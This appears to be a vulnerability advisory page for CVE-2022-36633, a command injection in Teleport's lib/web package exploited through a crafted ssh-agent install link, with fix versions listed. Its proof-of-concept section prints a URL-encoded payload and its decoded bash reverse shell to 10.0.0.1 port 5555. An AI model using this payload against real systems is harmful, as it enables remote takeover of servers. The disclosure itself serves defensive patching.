Command Injection Affecting github.com/gravitational/teleport/lib/web package, versions <8.3.17 >=9.0.0 <9.3.13 >=10.0.0 <10.1.2
Threat Intelligence
Exploit Maturity
Mature
EPSS
3.09% (92nd
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-GOLANG-GITHUBCOMGRAVITATIONALTELEPORTLIBWEB-2992509
- published 25 Aug 2022
- disclosed 25 Aug 2022
- credit Brandon Roach, Brian Landrum
Introduced: 25 Aug 2022
CVE-2022-36633 Open this link in a new tabHow to fix?
Upgrade github.com/gravitational/teleport/lib/web to version 8.3.17, 9.3.13, 10.1.2 or higher.
Overview
github.com/gravitational/teleport/lib/web is a Privileged access management tool.
Affected versions of this package are vulnerable to Command Injection via a crafted ssh-agent installation link, by URL encoding a bash escape with carriage return line feed which can be used in place of a token and sent to a user.
PoC:
Example payload:
https://teleport.site.com/scripts/%22%0a%2f%62%69%6e%2f%62%61%73%68%20%2d%6c%20%3e%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%30%2e%31%2f%35%35%35%35%20%30%3c%26%31%20%32%3e%26%31%20%23/install-node.sh?method=iam <https://teleport.site.com/scripts/%22%0a%2fbin%2fbash%20-l%20%3e%20%2fdev%2ftcp%2f10.0.0.1%2f5555%200%3c%261%202%3e%261%20%23/install-node.sh?method=iam>
Decoded payload:
"
/bin/bash -l > /dev/tcp/10.0.0.1/5555 0<&1 2>&1 #
CVSS Scores
version 3.1